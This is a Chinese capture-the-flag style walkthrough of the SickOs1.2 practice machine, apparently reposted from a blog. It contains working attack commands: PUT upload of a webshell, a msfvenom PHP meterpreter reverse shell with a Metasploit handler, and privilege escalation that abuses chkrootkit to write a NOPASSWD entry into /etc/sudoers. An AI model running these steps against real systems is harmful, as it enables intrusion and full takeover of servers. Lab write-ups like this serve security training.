标签:getshell chkrootkit 提权 渗透 sudoers etc SickOs1.2 靶机 目录
靶机记录--9
目录
3>> chkrootkit(后门检测工具,存在于上面那个目录,就是会每天执行)
4>> 利用chkrootkit,添加当前用户www-data到sudoers列表中
1.主机发现
2.端口扫描
有开启22,80端口
3.版本信息,操作系统扫描
OpenSSH 5.9p1
lighttpd 1.4.28
4.漏洞查找及利用
1> 访问网站
未发现可以利用的东西
2> 22端口尝试ssh登陆
root/root 登陆成功。。。但是这不是练习目的
3> 目录扫描
找到一个类似上传文件目录的东西
4> 查看该目录支持的方法
1>> nmap探测
nmap --script=http-methods --script-args http-methods.url-path=test 192.168.129.223可以看到,该目录支持PUT方法
2>> burp抓包探测
还可以用options 去探测其支持的方法
5> 写入一句话木马
直接就在上面那个包里修改,,201 创建成功
6> 蚁剑连接
7> getshell
1>> 将kali自带的反弹shell脚本复制出来
2>> 搞到蚁剑里来
修改ip+端口(有限制,用443)
3>> 访问反弹脚本
4>> getshell
kali这边提前监听
8> 提权
1>> 先查看内核版本和系统版本
2>> ls -la /etc/cron*
在/etc/cron.daily 目录下,创建脚本chmod +x 给与执行权限,每天会自动执行
3>> chkrootkit(后门检测工具,存在于上面那个目录,就是会每天执行)
找到 chkrootkit 存在本地提权漏洞
看一下那个txt文件
里面大概意思就是,会定期以root身份执行/tmp/update文件
4>> 利用chkrootkit,添加当前用户www-data到sudoers列表中
/etc/sudoers 该文件允许特定用户像root用户一样使用各种各样的命令,而不需要root用户的密码
echo 'chmod +w /etc/sudoers && echo "www-data ALL=(ALL)NOPASSWD:ALL" >> /etc/sudoers' > /tmp/update
提权成功
getshell方法二
1> 利用msfvenom生成一个php木马
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.129.129 LPORT=443 -f raw > shell.php
2> 然后将其传到靶机
curl -v -H 'Expect:' -T shell.php "http://192.168.129.223/test/"
3> 在msf上开启监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.129.129
set lport 443
exploit -j
sudo netstat -plnt
4> 访问上传的脚本
5> 然后msf这里
session -i 1
标签:getshell,chkrootkit,提权,渗透,sudoers,etc,SickOs1.2,靶机,目录 来源: https://blog.csdn.net/weixin_44769042/article/details/121232170
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。